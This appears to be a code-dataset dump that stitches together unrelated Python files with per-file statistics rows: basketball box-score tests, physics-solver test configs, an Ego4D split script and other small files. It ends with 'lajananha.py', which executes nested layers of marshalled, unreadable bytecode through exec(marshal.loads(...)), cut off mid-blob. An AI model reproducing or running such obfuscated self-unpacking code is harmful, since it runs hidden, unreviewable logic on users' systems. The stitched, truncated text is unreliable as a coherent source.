cell = MagicMock(text_content=MagicMock(return_value="some made free throws"))
self.html.xpath = MagicMock(return_value=[cell])
self.assertEqual(BasicBoxScoreRow(html=self.html).made_free_throws, "some made free throws")
self.html.xpath.assert_called_once_with('td[@data-stat="ft"]')
def test_made_free_throws_is_empty_string_when_cells_do_not_exist(self):
self.html.xpath = MagicMock(return_value=[])
self.assertEqual(BasicBoxScoreRow(html=self.html).made_free_throws, '')
self.html.xpath.assert_called_once_with('td[@data-stat="ft"]')
def test_attempted_free_throws_when_cells_exist(self):
cell = MagicMock(text_content=MagicMock(return_value="some attempted free throws"))
self.html.xpath = MagicMock(return_value=[cell])
self.assertEqual(BasicBoxScoreRow(html=self.html).attempted_free_throws, "some attempted free throws")
self.html.xpath.assert_called_once_with('td[@data-stat="fta"]')
def test_attempted_free_throws_is_empty_string_when_cells_do_not_exist(self):
self.html.xpath = MagicMock(return_value=[])
self.assertEqual(BasicBoxScoreRow(html=self.html).attempted_free_throws, '')
self.html.xpath.assert_called_once_with('td[@data-stat="fta"]')
def test_offensive_rebounds_when_cells_exist(self):
cell = MagicMock(text_content=MagicMock(return_value="some offensive rebounds"))
self.html.xpath = MagicMock(return_value=[cell])
self.assertEqual(BasicBoxScoreRow(html=self.html).offensive_rebounds, "some offensive rebounds")
self.html.xpath.assert_called_once_with('td[@data-stat="orb"]')
def test_offensive_rebounds_is_empty_string_when_cells_do_not_exist(self):
self.html.xpath = MagicMock(return_value=[])
self.assertEqual(BasicBoxScoreRow(html=self.html).offensive_rebounds, '')
self.html.xpath.assert_called_once_with('td[@data-stat="orb"]')
def test_defensive_rebounds_when_cells_exist(self):
cell = MagicMock(text_content=MagicMock(return_value="some defensive rebounds"))
self.html.xpath = MagicMock(return_value=[cell])
self.assertEqual(BasicBoxScoreRow(html=self.html).defensive_rebounds, "some defensive rebounds")
self.html.xpath.assert_called_once_with('td[@data-stat="drb"]')
def test_defensive_rebounds_is_empty_string_when_cells_do_not_exist(self):
self.html.xpath = MagicMock(return_value=[])
self.assertEqual(BasicBoxScoreRow(html=self.html).defensive_rebounds, '')
self.html.xpath.assert_called_once_with('td[@data-stat="drb"]')
def test_assists_when_cells_exist(self):
cell = MagicMock(text_content=MagicMock(return_value="some assists"))
self.html.xpath = MagicMock(return_value=[cell])
self.assertEqual(BasicBoxScoreRow(html=self.html).assists, "some assists")
self.html.xpath.assert_called_once_with('td[@data-stat="ast"]')
def test_assists_is_empty_string_when_cells_do_not_exist(self):
self.html.xpath = MagicMock(return_value=[])
self.assertEqual(BasicBoxScoreRow(html=self.html).assists, '')
self.html.xpath.assert_called_once_with('td[@data-stat="ast"]')
def test_steals(self):
cell = MagicMock(text_content=MagicMock(return_value="some steals"))
self.html.xpath = MagicMock(return_value=[cell])
self.assertEqual(BasicBoxScoreRow(html=self.html).steals, "some steals")
self.html.xpath.assert_called_once_with('td[@data-stat="stl"]')
def test_steals_is_empty_string_when_cells_do_not_exist(self):
self.html.xpath = MagicMock(return_value=[])
self.assertEqual(BasicBoxScoreRow(html=self.html).steals, '')
self.html.xpath.assert_called_once_with('td[@data-stat="stl"]')
def test_blocks_when_cells_exist(self):
cell = MagicMock(text_content=MagicMock(return_value="some blocks"))
self.html.xpath = MagicMock(return_value=[cell])
self.assertEqual(BasicBoxScoreRow(html=self.html).blocks, "some blocks")
self.html.xpath.assert_called_once_with('td[@data-stat="blk"]')
def test_blocks_is_empty_string_when_cells_do_not_exist(self):
self.html.xpath = MagicMock(return_value=[])
self.assertEqual(BasicBoxScoreRow(html=self.html).blocks, '')
self.html.xpath.assert_called_once_with('td[@data-stat="blk"]')
def test_turnovers_when_cells_exist(self):
cell = MagicMock(text_content=MagicMock(return_value="some turnovers"))
self.html.xpath = MagicMock(return_value=[cell])
self.assertEqual(BasicBoxScoreRow(html=self.html).turnovers, "some turnovers")
self.html.xpath.assert_called_once_with('td[@data-stat="tov"]')
def test_turnovers_is_empty_string_when_cells_do_not_exist(self):
self.html.xpath = MagicMock(return_value=[])
self.assertEqual(BasicBoxScoreRow(html=self.html).turnovers, '')
self.html.xpath.assert_called_once_with('td[@data-stat="tov"]')
def test_personal_fouls_when_cells_exist(self):
cell = MagicMock(text_content=MagicMock(return_value="some personal fouls"))
self.html.xpath = MagicMock(return_value=[cell])
self.assertEqual(BasicBoxScoreRow(html=self.html).personal_fouls, "some personal fouls")
self.html.xpath.assert_called_once_with('td[@data-stat="pf"]')
def test_personal_fouls_is_empty_string_when_cells_do_not_exist(self):
self.html.xpath = MagicMock(return_value=[])
self.assertEqual(BasicBoxScoreRow(html=self.html).personal_fouls, '')
self.html.xpath.assert_called_once_with('td[@data-stat="pf"]')
def test_points(self):
cell = MagicMock(text_content=MagicMock(return_value="some points"))
self.html.xpath = MagicMock(return_value=[cell])
self.assertEqual(BasicBoxScoreRow(html=self.html).points, "some points")
self.html.xpath.assert_called_once_with('td[@data-stat="pts"]')
def test_points_is_empty_string_when_cells_do_not_exist(self):
self.html.xpath = MagicMock(return_value=[])
self.assertEqual(BasicBoxScoreRow(html=self.html).points, '')
self.html.xpath.assert_called_once_with('td[@data-stat="pts"]')
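# The tests above all exercise one pattern: a property selects a single <td> cell by its
# data-stat attribute and falls back to an empty string when the cell is missing. A
# minimal sketch of that pattern (hypothetical; not the library's actual implementation):
class _SketchBoxScoreRow:
    def __init__(self, html):
        self.html = html  # an lxml element in production, a MagicMock in these tests

    @property
    def points(self):
        cells = self.html.xpath('td[@data-stat="pts"]')
        return cells[0].text_content() if cells else ''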
| 55.057292
| 110
| 0.730773
| 1,382
| 10,571
| 5.285094
| 0.05644
| 0.106243
| 0.11391
| 0.096386
| 0.952903
| 0.93839
| 0.928122
| 0.917716
| 0.907996
| 0.887185
| 0
| 0.000443
| 0.145303
| 10,571
| 191
| 111
| 55.34555
| 0.807969
| 0
| 0
| 0.423077
| 0
| 0
| 0.121275
| 0.003973
| 0
| 0
| 0
| 0
| 0.410256
| 1
| 0.211538
| false
| 0
| 0.019231
| 0
| 0.237179
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
90739b0bc0b11e92aca673c5fa2fb0ae3692f080
| 4,336
|
py
|
Python
|
pyne/tests/spatial_solvers/dictionary_populate_test.py
|
AllSafeCyberSecur1ty/Nuclear-Engineering
|
302d6dcc7c0a85a9191098366b076cf9cb5a9f6e
|
[
"MIT"
] | 1
|
2022-03-26T20:01:13.000Z
|
2022-03-26T20:01:13.000Z
|
pyne/tests/spatial_solvers/dictionary_populate_test.py
|
AllSafeCyberSecur1ty/Nuclear-Engineering
|
302d6dcc7c0a85a9191098366b076cf9cb5a9f6e
|
[
"MIT"
] | null | null | null |
pyne/tests/spatial_solvers/dictionary_populate_test.py
|
AllSafeCyberSecur1ty/Nuclear-Engineering
|
302d6dcc7c0a85a9191098366b076cf9cb5a9f6e
|
[
"MIT"
] | 1
|
2022-03-26T19:59:13.000Z
|
2022-03-26T19:59:13.000Z
|
"""This file creates a sample dictionary to test the spatial_solver code's."""
import numpy as np
cell_widths = np.array([0.25, 0.25, 0.25, 0.25], "float64", order="F")
def populate_simple(solverin, solvertypein):
solver_dict = {
"solver": solverin,
"solver_type": solvertypein,
"spatial_order": 1,
"angular_quadrature_order": 4,
"angular_quadrature_type": 1,
"nodes_xyz": [4, 4, 4],
"num_groups": 1,
"num_materials": 1,
"x_cells_widths": cell_widths,
"y_cells_widths": cell_widths,
"z_cells_widths": cell_widths,
#'x_cells_widths':[0.25, 0.25, 0.25, 0.25],
#'y_cells_widths':[0.25, 0.25, 0.25, 0.25],
#'z_cells_widths':[0.25, 0.25, 0.25, 0.25],
"x_boundry_conditions": [2, 2],
"y_boundry_conditions": [2, 2],
"z_boundry_conditions": [2, 2],
#'material_id': np.array([[[1]*4]*4]*4, 'float64'),
"material_id": [[[1] * 4] * 4] * 4,
"quadrature_file": "quad_file",
"xs_file": "spatial_solvers/xs",
"source_input_file": "spatial_solvers/src_4.dat",
#'source_input_file':'src_non_binary',
"bc_input_file": "spatial_solvers/bc_4.dat",
"flux_output_file": "spatial_solvers/phi_4.ahot",
"convergence_criterion": 1.0e-12,
"max_iterations": 6000,
"moments_converged": 0,
"converge_tolerence": 1.0e-10,
}
if solverin == "SCTSTEP":
solver_dict["bc_input_file"] = "spatial_solvers/bc_4_sct.dat"
return solver_dict
def populate_simple_with_warnings(solverin):
solver_dict = {
"solver": solverin,
#'solver_type':solvertypein,
#'spatial_order':1,
#'angular_quadrature_order':4,
#'angular_quadrature_type':1,
"nodes_xyz": [4, 4, 4],
"num_groups": 1,
"num_materials": 1,
"x_cells_widths": cell_widths,
"y_cells_widths": cell_widths,
"z_cells_widths": cell_widths,
"x_boundry_conditions": [2, 2],
"y_boundry_conditions": [2, 2],
"z_boundry_conditions": [2, 2],
"material_id": [[[1] * 4] * 4] * 4,
"quadrature_file": "spatial_solvers/quad_file",
"xs_file": "spatial_solvers/xs",
"source_input_file": "spatial_solvers/src_4.dat",
"bc_input_file": "spatial_solvers/bc_4.dat",
"flux_output_file": "spatial_solvers/phi_4.ahot",
#'convergence_criterion':1.e-12,
#'max_iterations':6000,
#'moments_converged':0,
#'converge_tolerence':1.e-10
}
return solver_dict
def populate_intermediate_1(solverin, solvertypein):
solver_dict = {
"solver": solverin,
"solver_type": solvertypein,
"spatial_order": 1,
"angular_quadrature_order": 4,
"angular_quadrature_type": 1,
"nodes_xyz": [4, 4, 4],
"num_groups": 1,
"num_materials": 2,
"x_cells_widths": cell_widths,
"y_cells_widths": cell_widths,
"z_cells_widths": cell_widths,
"x_boundry_conditions": [2, 2],
"y_boundry_conditions": [2, 2],
"z_boundry_conditions": [2, 2],
"material_id": [
[
[1, 2, 1, 2],
[2, 1, 2, 1],
[1, 2, 1, 2],
[2, 1, 2, 1],
],
[
[2, 1, 2, 1],
[1, 2, 1, 2],
[2, 1, 2, 1],
[1, 2, 1, 2],
],
[
[1, 2, 1, 2],
[2, 1, 2, 1],
[1, 2, 1, 2],
[2, 1, 2, 1],
],
[
[2, 1, 2, 1],
[1, 2, 1, 2],
[2, 1, 2, 1],
[1, 2, 1, 2],
],
],
"quadrature_file": "quad_file",
"xs_file": "spatial_solvers/xs_alternating",
"source_input_file": "spatial_solvers/src_4.dat",
"bc_input_file": "spatial_solvers/bc_4.dat",
"flux_output_file": "spatial_solvers/phi_4.ahot",
"convergence_criterion": 1.0e-12,
"max_iterations": 6000,
"moments_converged": 0,
"converge_tolerence": 1.0e-10,
}
if solverin == "SCTSTEP":
solver_dict["bc_input_file"] = "spatial_solvers/bc_4_sct.dat"
return solver_dict
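# Quick sanity check of the helpers above (the solver names passed in here are only
# illustrative; "SCTSTEP" is the one value the functions treat specially):
if __name__ == "__main__":
    simple = populate_simple("SCTSTEP", "anything")
    assert simple["bc_input_file"] == "spatial_solvers/bc_4_sct.dat"
    assert simple["nodes_xyz"] == [4, 4, 4]
    intermediate = populate_intermediate_1("AHOTN", "LN")
    assert intermediate["num_materials"] == 2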
| 33.353846
| 78
| 0.531827
| 539
| 4,336
| 3.955473
| 0.157699
| 0.02439
| 0.026735
| 0.02439
| 0.888837
| 0.871013
| 0.871013
| 0.871013
| 0.850844
| 0.82364
| 0
| 0.073564
| 0.313423
| 4,336
| 129
| 79
| 33.612403
| 0.642593
| 0.113007
| 0
| 0.850467
| 0
| 0
| 0.359718
| 0.123302
| 0
| 0
| 0
| 0
| 0
| 1
| 0.028037
| false
| 0
| 0.009346
| 0
| 0.065421
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
909c5f61656651fdc8cac87e62c0ab706502f314
| 203
|
py
|
Python
|
jackal_envs/envs/__init__.py
|
dgauraang/APPLR
|
06e0e26e1d3449406a905e6d282797f1f572547a
|
[
"MIT"
] | null | null | null |
jackal_envs/envs/__init__.py
|
dgauraang/APPLR
|
06e0e26e1d3449406a905e6d282797f1f572547a
|
[
"MIT"
] | null | null | null |
jackal_envs/envs/__init__.py
|
dgauraang/APPLR
|
06e0e26e1d3449406a905e6d282797f1f572547a
|
[
"MIT"
] | null | null | null |
from jackal_envs.envs.jackal_navigation_env import GazeboJackalNavigationEnv
from jackal_envs.envs.gazebo_simulation import GazeboSimulation
from jackal_envs.envs.navigation_stack import NavigationStack
| 50.75
| 76
| 0.91133
| 25
| 203
| 7.12
| 0.48
| 0.168539
| 0.235955
| 0.303371
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.059113
| 203
| 3
| 77
| 67.666667
| 0.931937
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
90a4af250b62ba0734941f177b6e41db8fde0a63
| 856
|
py
|
Python
|
tests/basics/string_large.py
|
learnforpractice/micropython-cpp
|
004bc8382f74899e7b876cc29bfa6a9cc976ba10
|
[
"MIT"
] | 13,648
|
2015-01-01T01:34:51.000Z
|
2022-03-31T16:19:53.000Z
|
tests/basics/string_large.py
|
learnforpractice/micropython-cpp
|
004bc8382f74899e7b876cc29bfa6a9cc976ba10
|
[
"MIT"
] | 7,092
|
2015-01-01T07:59:11.000Z
|
2022-03-31T23:52:18.000Z
|
tests/basics/string_large.py
|
learnforpractice/micropython-cpp
|
004bc8382f74899e7b876cc29bfa6a9cc976ba10
|
[
"MIT"
] | 4,942
|
2015-01-02T11:48:50.000Z
|
2022-03-31T19:57:10.000Z
|
s1 = "long string long string long string long string long string long string long string long string long string long string long string long string long string long string long string long string long string long string long string long string long string long string long string long string long string long string long string long string long string long string long string long string long string long string long string long string long string long string long string long string long string"
s2 = "concatenated string" "concatenated string" "concatenated string" "concatenated string" "concatenated string" "concatenated string" "concatenated string" "concatenated string" "concatenated string" "concatenated string" "concatenated string" "concatenated string" "concatenated string" "concatenated string" "concatenated string" "concatenated string"
| 285.333333
| 498
| 0.820093
| 116
| 856
| 6.051724
| 0.043103
| 0.584046
| 0.797721
| 1.139601
| 0.994302
| 0.994302
| 0.994302
| 0.994302
| 0.994302
| 0.994302
| 0
| 0.00271
| 0.13785
| 856
| 2
| 499
| 428
| 0.948509
| 0
| 0
| 0
| 0
| 0.5
| 0.928738
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 13
|
90bf53e9d3b84ba35c0f7a4ea8314ac4361859ea
| 95
|
py
|
Python
|
tbhandler/config.py
|
quintenroets/tbhandler
|
f2c399a1403e538d77c39e87b1a2a79a3e30f286
|
[
"MIT"
] | null | null | null |
tbhandler/config.py
|
quintenroets/tbhandler
|
f2c399a1403e538d77c39e87b1a2a79a3e30f286
|
[
"MIT"
] | null | null | null |
tbhandler/config.py
|
quintenroets/tbhandler
|
f2c399a1403e538d77c39e87b1a2a79a3e30f286
|
[
"MIT"
] | null | null | null |
import os
def show_locals():
return os.environ.get("full_traceback", "false") != "false"
| 15.833333
| 63
| 0.673684
| 13
| 95
| 4.769231
| 0.846154
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.157895
| 95
| 5
| 64
| 19
| 0.775
| 0
| 0
| 0
| 0
| 0
| 0.252632
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
90c3ee40f91e317b722d1bc654fbd4101615b359
| 5,601
|
py
|
Python
|
utils/ground_truth/extract_clipnames_and_split_indices.py
|
EGO4D/audio-visual
|
bed9d837f4212e89540fe73f54399f69739b73f5
|
[
"MIT"
] | 15
|
2021-12-06T14:13:23.000Z
|
2022-03-14T02:02:53.000Z
|
utils/ground_truth/extract_clipnames_and_split_indices.py
|
EGO4D/audio-visual
|
bed9d837f4212e89540fe73f54399f69739b73f5
|
[
"MIT"
] | null | null | null |
utils/ground_truth/extract_clipnames_and_split_indices.py
|
EGO4D/audio-visual
|
bed9d837f4212e89540fe73f54399f69739b73f5
|
[
"MIT"
] | 3
|
2021-11-25T19:10:21.000Z
|
2022-03-11T12:10:41.000Z
|
# Extract clipnames and video indices for training, testing and validation
# Usage: python3 extract_clipnames_and_split_indices.py
import json
import os
def write_list(file_name, alist):
with open(file_name, 'w') as f:
for item in alist:
f.write("%s\n" % str(item))
with open('av_train.json') as f:
data = json.load(f)
clip_uids = []
clip_names = []
for n in range(len(data['videos'])):
for m in range(len(data['videos'][n]['clips'])):
clip_uid = data['videos'][n]['clips'][m]['clip_uid']
clip_uids.append(clip_uid)
clip_names.append(clip_uid + '.mp4')
with open('av_val.json') as f:
data = json.load(f)
for n in range(len(data['videos'])):
for m in range(len(data['videos'][n]['clips'])):
clip_uid = data['videos'][n]['clips'][m]['clip_uid']
clip_uids.append(clip_uid)
clip_names.append(clip_uid + '.mp4')
#with open('av_test.json') as f:
# data = json.load(f)
#
#for n in range(len(data['videos'])):
# for m in range(len(data['videos'][n]['clips'])):
# clip_uid = data['videos'][n]['clips'][m]['clip_uid']
# clip_uids.append(clip_uid)
# clip_names.append(clip_uid + '.mp4')
write_list('v.txt', clip_names)
with open('av_val.json') as f:
data = json.load(f)
val_clip_indices = []
for n in range(len(data['videos'])):
for m in range(len(data['videos'][n]['clips'])):
val_clip_uid = data['videos'][n]['clips'][m]['clip_uid']
val_clip_indices.append(clip_uids.index(val_clip_uid))
write_list('val.txt', val_clip_indices)
#with open('av_test.json') as f:
# data = json.load(f)
#
#test_clip_indices = []
#for n in range(len(data['videos'])):
# for m in range(len(data['videos'][n]['clips'])):
# test_clip_uid = data['videos'][n]['clips'][m]['clip_uid']
# test_clip_indices.append(clip_uids.index(test_clip_uid))
#
#write_list('test.txt', test_clip_indices)
with open('av_train.json') as f:
data = json.load(f)
train_clip_indices = []
for n in range(len(data['videos'])):
for m in range(len(data['videos'][n]['clips'])):
train_clip_uid = data['videos'][n]['clips'][m]['clip_uid']
train_clip_indices.append(clip_uids.index(train_clip_uid))
write_list('train.txt', train_clip_indices)
os.system('cp v.txt ../../active-speaker-detection/vad/v.txt')
os.system('cp v.txt ../../diarization/audio-visual/DER/der_train_on_ego4d/v.txt')
os.system('cp v.txt ../../diarization/audio-visual/DER/der_notrain_on_ego4d/v.txt')
os.system('cp v.txt ../../active-speaker-detection/wearer/energy_based/v.txt')
os.system('cp v.txt ../../active-speaker-detection/wearer/spectrogram/data/v.txt')
os.system('cp v.txt ../../active-speaker-detection/active_speaker/mrc_active_speaker_detection/prediction/v.txt')
os.system('cp v.txt ../../active-speaker-detection/active_speaker/active_speaker_evaluation/mAP_talknet/input/v.txt')
os.system('cp v.txt ../../active-speaker-detection/active_speaker/active_speaker_evaluation/mAP_mrc/input/v.txt')
os.system('cp v.txt ../../active-speaker-detection/audio_embedding/make_audio_embeddings/v.txt')
os.system('cp v.txt ../../active-speaker-detection/surrounding_people_audio_matching/mrc/v.txt')
os.system('cp v.txt ../../active-speaker-detection/surrounding_people_audio_matching/talknet/v.txt')
os.system('cp v.txt ../../tracking/v.txt')
os.system('cp v.txt ../../tracking/global_tracking/v.txt')
#os.system('cp test.txt ../../diarization/audio-visual/DER/der_train_on_ego4d/test.txt')
#os.system('cp test.txt ../../diarization/audio-visual/DER/der_notrain_on_ego4d/test.txt')
#os.system('cp test.txt ../../wearer/energy_based/test.txt')
#os.system('cp test.txt ../../active-speaker-detection/active_speaker/mrc_active_speaker_detection/prediction/test.txt')
#os.system('cp test.txt ../../active-speaker-detection/active_speaker/active_speaker_evaluation/mAP_talknet/input/test.txt')
#os.system('cp test.txt ../../active-speaker-detection/active_speaker/active_speaker_evaluation/mAP_mrc/input/test.txt')
#os.system('cp test.txt ../../active-speaker-detection/audio_embedding/make_audio_embeddings/test.txt')
#os.system('cp test.txt ../../active-speaker-detection/surrounding_people_audio_matching/mrc/test.txt')
#os.system('cp test.txt ../../active-speaker-detection/surrounding_people_audio_matching/talknet/test.txt')
#os.system('cp test.txt ../../tracking/test.txt')
#os.system('cp test.txt ../../active-speaker-detection/wearer/spectrogram/prediction')
os.system('cp val.txt ../../diarization/audio-visual/DER/der_train_on_ego4d/val.txt')
os.system('cp val.txt ../../diarization/audio-visual/DER/der_notrain_on_ego4d/val.txt')
os.system('cp val.txt ../../active-speaker-detection/wearer/energy_based/val.txt')
os.system('cp val.txt ../../active-speaker-detection/active_speaker/mrc_active_speaker_detection/prediction/val.txt')
os.system('cp val.txt ../../active-speaker-detection/active_speaker/active_speaker_evaluation/mAP_talknet/input/val.txt')
os.system('cp val.txt ../../active-speaker-detection/active_speaker/active_speaker_evaluation/mAP_mrc/input/val.txt')
os.system('cp val.txt ../../active-speaker-detection/audio_embedding/make_audio_embeddings/val.txt')
os.system('cp val.txt ../../active-speaker-detection/surrounding_people_audio_matching/mrc/val.txt')
os.system('cp val.txt ../../active-speaker-detection/surrounding_people_audio_matching/talknet/val.txt')
os.system('cp val.txt ../../tracking/val.txt')
os.system('cp val.txt ../../active-speaker-detection/wearer/spectrogram/prediction')
os.system('cp train.txt ../../active-speaker-detection/wearer/spectrogram/train/train.txt')
| 47.871795
| 124
| 0.718979
| 880
| 5,601
| 4.395455
| 0.094318
| 0.144519
| 0.093071
| 0.11091
| 0.885729
| 0.880041
| 0.840745
| 0.823164
| 0.800414
| 0.714064
| 0
| 0.001954
| 0.086056
| 5,601
| 116
| 125
| 48.284483
| 0.753663
| 0.315836
| 0
| 0.34375
| 0
| 0.0625
| 0.567518
| 0.436694
| 0
| 0
| 0
| 0
| 0
| 1
| 0.015625
| false
| 0
| 0.03125
| 0
| 0.046875
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2900c9a70465235895f01cc371c9f55b7cf326e9
| 147,718
|
py
|
Python
|
lajananha.py
|
sanjida9999/nwnwin
|
9bd8af291561a3bd007ec97ce21f25db09b63546
|
[
"Apache-2.0"
] | null | null | null |
lajananha.py
|
sanjida9999/nwnwin
|
9bd8af291561a3bd007ec97ce21f25db09b63546
|
[
"Apache-2.0"
] | null | null | null |
lajananha.py
|
sanjida9999/nwnwin
|
9bd8af291561a3bd007ec97ce21f25db09b63546
|
[
"Apache-2.0"
] | null | null | null |
import marshal
exec(marshal.loads(b'\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\x19\xd9\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\xba\xd8\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s[\xd8\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\xfc\xd7\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\x9d\xd7\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s>\xd7\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\xdf\xd6\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\x80\xd6\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s!\xd6\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\xc2\xd5\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02sc\xd5\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\x04\xd5\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\xa5\xd4\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02sF\xd4\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\xe7\xd3\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\x88\xd3\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s)\xd3\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\xca\xd2\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02sk\xd2\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\x0c\xd2\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02s\xad\xd1\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\xf3\t\x00\x00\x00d\x00Z\x00d\x01S\x00\t\xa9\x02sN\xd1\x
